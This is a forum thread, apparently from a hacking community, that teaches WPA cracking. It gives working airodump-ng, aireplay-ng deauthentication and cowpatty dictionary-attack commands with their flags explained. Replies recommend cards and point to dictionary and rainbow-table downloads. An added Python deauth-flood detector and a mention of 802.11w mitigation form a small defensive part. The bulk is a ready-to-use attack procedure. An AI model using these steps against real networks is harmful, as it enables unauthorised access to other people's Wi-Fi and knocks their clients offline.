Cracking WPA
Crack WPA using Cowpatty, aireplay, and airodump...
First, we need to get some information about the network. In this attack, we need a connected client.
Run the command
airodump-ng -w out -c 6 ath1
-w out -- saves the captured data in a file named out
-c 6 -- sets airodump to capture on channel 6
ath1 -- specifies what wireless interface to use
Now we need to look at the information airodump displays for what we need. We will see the network we are attacking. We need to look at the BSSID column for the AP MAC address and the ESSID column for the network name. In this example, we will see our AP MAC is 00:09:5B:E7:02:46 and our network is named Home. We will also need the MAC address of the client connected to the network. In this example, the client connected to the Home network has a MAC address of 00:0D:88:C2:27:21.
Now we need to disconnect the connected client so it is forced to reconnect. Windows machines usually try to reconnect right away if they lose connection. When the client reconnects to the network we want to capture the 4-way handshake that WPA performs.
To deauthenticate the client, run the command
aireplay-ng -0 0 -c 00:0D:88:C2:27:21 -a 00:09:5B:E7:02:46 -e Home ath1
-0 0 -- selects the deauthentication attack. The number sets how many deauthentication packets to send; 0 means it keeps sending until you stop it.
-c -- sets the client to deauthenticate
-a -- sets the AP MAC
-e -- sets the name of the network you are deauthenticating the client from.
ath1 -- specifies the wireless interface to use
After sending several deauthentication packets out, the client should be kicked off the network. Now we need to start airodump again to capture the handshake. Run the same command as before
airodump-ng -w out -c 6 ath1
Now we wait for the notice in the top right of the screen telling us the handshake has been captured.
Once the handshake has been captured, we can stop airodump and start up cowpatty to crack the key. Run the command
cowpatty -f dict -r out-07.cap -s Home
-f dict -- sets the dictionary file to use as dict. This should be whatever dictionary file you are using. Mine just happens to be called dict.
-r out-07.cap -- sets the capture file you made using airodump. Mine is called out-07.cap, yours may be called something else.
-s Home -- sets the network ESSID you are cracking. Mine is called Home.
Now cowpatty will run through the dictionary file, trying each entry as the passphrase. If the passphrase is not in your dictionary, the attack will not work. When it finds the passphrase, it will tell you.
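The deauthentication step above (aireplay-ng -0 0) shows up on the air as a burst of deauth frames from the AP's MAC to one client. The following is an added example, not code from the original post, of how a defender can spot that burst: it runs a sliding-window counter over a constructed list of parsed 802.11 management-frame records. The record layout (timestamp, subtype, src, dst) and the threshold are assumptions, not any particular tool's output.

```python
from collections import defaultdict

# MAC addresses taken from the tutorial above
AP_MAC = "00:09:5B:E7:02:46"
CLIENT_MAC = "00:0D:88:C2:27:21"
BROADCAST = "ff:ff:ff:ff:ff:ff"


def constructed_frames():
    """Constructed sample of parsed management frames: (timestamp_s, subtype, src, dst).

    Layout is an assumption for this example, not a real capture-tool format.
    """
    # normal beacons, ten per second
    frames = [(i * 0.1, "beacon", AP_MAC, BROADCAST) for i in range(20)]
    # a single isolated deauth to some other station: not suspicious on its own
    frames.append((0.3, "deauth", AP_MAC, "00:11:22:33:44:55"))
    # what "aireplay-ng -0 0" looks like: 40 deauths spoofed from the AP
    # to one client within about 0.4 s
    frames += [(1.0 + i * 0.01, "deauth", AP_MAC, CLIENT_MAC) for i in range(40)]
    return frames


def deauth_flood_alerts(frames, window_s=1.0, threshold=10):
    """Return one alert per (src, dst) pair that sends at least `threshold`
    deauth frames inside any sliding window of `window_s` seconds."""
    stamps_by_pair = defaultdict(list)
    for ts, subtype, src, dst in frames:
        if subtype == "deauth":
            stamps_by_pair[(src, dst)].append(ts)

    alerts = []
    for (src, dst), stamps in stamps_by_pair.items():
        stamps.sort()
        left = 0
        for right, ts in enumerate(stamps):
            # shrink the window from the left until it spans <= window_s
            while ts - stamps[left] > window_s:
                left += 1
            count = right - left + 1
            if count >= threshold:
                alerts.append({"src": src, "dst": dst,
                               "start": stamps[left], "count": count})
                break  # one alert per pair is enough
    return alerts


if __name__ == "__main__":
    for alert in deauth_flood_alerts(constructed_frames()):
        print(f"deauth flood: {alert['src']} -> {alert['dst']} "
              f"({alert['count']} frames from t={alert['start']:.2f}s)")
```

An isolated deauth frame is normal traffic, so the detector keys on rate per (source, destination) pair rather than on the frame type alone. Spoofed deauth frames like these are what 802.11w (Protected Management Frames) exists to block, so enabling it on the AP is the corresponding mitigation.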
Re: Can't capture the handshake
I have never used the ipw220 card, so I don't know if it would work or not. Your best bet would be to set up a computer connected to the network that you can see (physically look at), run the command, and see if they are kicked off. If it doesn't kick them off, either the card will not work or the command was entered wrong.
"Sometimes one pays most for the things one gets for nothing." - Albert Einstein
Since Uffda is the expert
Since Uffda is the expert I'll let him answer that, but I can say without using a confirmed working NIC you can run into hours of frustration. I had a lot of problems cracking WEP and wasted a lot of time with this POS card I had laying around. I ended up investing in something I knew others had success with.
r00tk1ll | BeyondTheBit
Can't capture the handshake
Hello there,
After deauthenticating the client I can't capture the handshake with the airodump-ng command, even after hours of waiting. I use ipw2200, is it the problem? Also I want to know how to determine whether the deauthenticate command is successful or not. Should I use another wifi card instead of ipw2200? Are there any hardware/software updates to resolve the problem with ipw2200?
thanks
Re: Hey where is that 30GB
There is a rainbow table for WPA cracking made by a group of people. You can find it here.
http://www.renderlab.net/projects/WPA-tables/
When I get my external USB drive, I am going to get that one. :)
Hey where is that 30GB
Hey where is that 30GB Dictionary file link??
r00tk1ll | BeyondTheBit
Re: how to get a dictionary file
Also, I have never tried to use a dictionary file that is not located in the same directory, but I'll take a guess. Usually you can just specify the entire path name when referencing the dictionary file.
Such as "-f /usr/doc/cowpatty/dict"
Re: how to get a dictionary file
The one I used was the sample one that is included with cowpatty. In BT2, it is located here: /usr/doc/cowpatty/dict. It may be located in the same place in BT3, but if it is not, type "locate cowpatty" in a terminal and look for the cowpatty docs and one called dict.
For more dictionary files, you can go to http://www.elitehackers.info/forums/downloads.php?do=cat&id=8 and download some.
Hope this helps.
Wait for uffda4761, he knows
Wait for uffda4761, he knows more about this than I do, I will get in contact with him
r00tk1ll | BeyondTheBit
how to get a dictionary file
I want to know how I can get the dictionary file as in the tutorial here?
I use backtrack 3, does it already have the dictionary file to use? And how do I refer to the dictionary file if it isn't in the same directory?
thanks
Nice man, thanks for adding
Nice man, thanks for adding the tutorial it makes it a lot easier to follow. We need to work on some of our ettercap tricks next.
r00tk1ll | BeyondTheBit
I use a netgear PCMCIA.
I use a netgear PCMCIA. Model: WG511T.
"Punchin fake bosses in the ribs til them shits pokin out like Kate Moss's"
Not yet, I just used the
Not yet, I just used the base dictionary file that comes with Cowpatty, in the cowpatty directory for this.
"Punchin fake bosses in the ribs til them shits pokin out like Kate Moss's"
What wireless NIC?
What wireless NIC are you using??
Awesome
WPA has always been a challenge for me, are you using any rainbow tables?